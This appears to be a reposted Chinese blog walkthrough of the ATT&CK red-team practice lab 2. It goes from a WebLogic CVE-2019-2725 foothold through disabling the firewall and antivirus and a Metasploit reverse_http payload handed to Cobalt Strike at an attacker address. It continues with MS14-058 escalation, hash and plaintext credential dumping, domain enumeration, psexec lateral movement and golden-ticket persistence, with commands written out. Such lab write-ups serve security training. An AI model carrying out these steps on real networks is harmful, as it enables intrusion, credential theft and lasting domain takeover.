当前位置:   article > 正文

ATT&CK红队评估实战靶场二

att&ck红队评估实战靶场二

描述

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。

靶场地址:漏洞详情

环境说明:10.10.10.1/24

DMZ网段:192.168.1.0/24

DC:10.10.10.10

WEB:10.10.10.80\192.168.1.8

PC:10.10.10.20\192.168.1.11

WEB机器开启WebLogic服务

C:\Oracle\Middleware\user_projects\domains\base_domain\bin 

startWebLogic---以管理员身份运行

b1be26f087a442d587fa5e80bfe7cd67.png

这个窗口不要关闭

fd482ad5d1d84e4da2ebfdcd1e7c9bc0.png

一、信息收集

扫描WEB主机

nmap -sV -T4 192.168.1.8

d294332d2d714a138d79aab3c6c7233d.png

访问80端口,是空白

访问7001端口,发现是WebLogic服务

a1531c503e1047188c37e8f8698ff41a.png

访问控制台:192.168.1.8:7001/console/login/LoginForm.jsp

尝试弱口令登录,被拒绝

dd4a2b156166432593779038493c02b7.png

WeblogicScan 扫描漏洞

发现CVE-2019-2725

537d82f2b31042fb88a53d5402e0325e.png

56ada560e2eb4cb486b7f4f369835803.png

先将防火墙和360关闭

9e533eb1909847478557c0acb4d83a2b.png

web主机存在两个网段

2cba1ebad01241aa851841449c6f4de3.png

上线CS

创建侦听

04ee0c52d20e4675a89dc3f13cf8da33.png

MSF转发会话

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.1.134
set lport 8855
set session 1

489cdc6a3c9f49f796d2aa1becc48593.png

33cd65c9755d46b3b7727f4dc9021d4f.png

CS收到会话

设置睡眠:sleep 1

6ff0ea243e0040d7962f0b325565ae40.png

提升权限

利用插件:MS14-058漏洞提升权限

74f03692fd0542c5a8408b7b797f9ccf.png

扫描端口

explore--port scan--选择10.10.10.0网段扫描

0b43da6c4df94f46b785684764b54f4a.png

发现三台内网主机

获取hash

hashdump           #获取hash

logonpasswords  #获取明文密码

2a6e32233d344f5e99c3e872b21fb59a.png

查看域控

关闭防火墙:netsh advfirewall set allprofiles state off
查看有几个域:net view /domain
查看域名:net config workstation
查看域内主机:net view
查询域内用户:net user /domain
查看域管理员:net group "domain admins" /domain  

d65dac62669c4b6daba701f9badc138c.png

使用CS自带功能,RunMinikatz获取hash和明文密码

创建SMB侦听器

name:自定义

payload:选择beacon SMB

save

Psexec

目标需要开放445端口和admin

上线DC

 选择de1ay\administrator账户

Listener选择刚才创建的SMB

session选择

上线DC

上线PC与上线DC步骤一致

权限维持

在域控获得KRBTGT账户NTLM密码哈希和SID,然后复制保存到记事本!

域名:de1ay.com

黄金票据利用

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。

黄金票据的条件要求:

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当失去域控权限时,内其他在通过域任意机器伪造票据重新获取最高权限。

WEB主机 Administrator账户权限-t>右键->Access->Golden Ticket

伪造成功

查看当前系统的票据:

mimikatz kerberos::list

可以访问域控

使用当前令牌登录PC

勾选Use session's current access token

参考:

ATT&CK实战系列——红队实战(二)-腾讯云开发者社区-腾讯云

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/空白诗007/article/detail/1019241
推荐阅读
相关标签
  

闽ICP备14008679号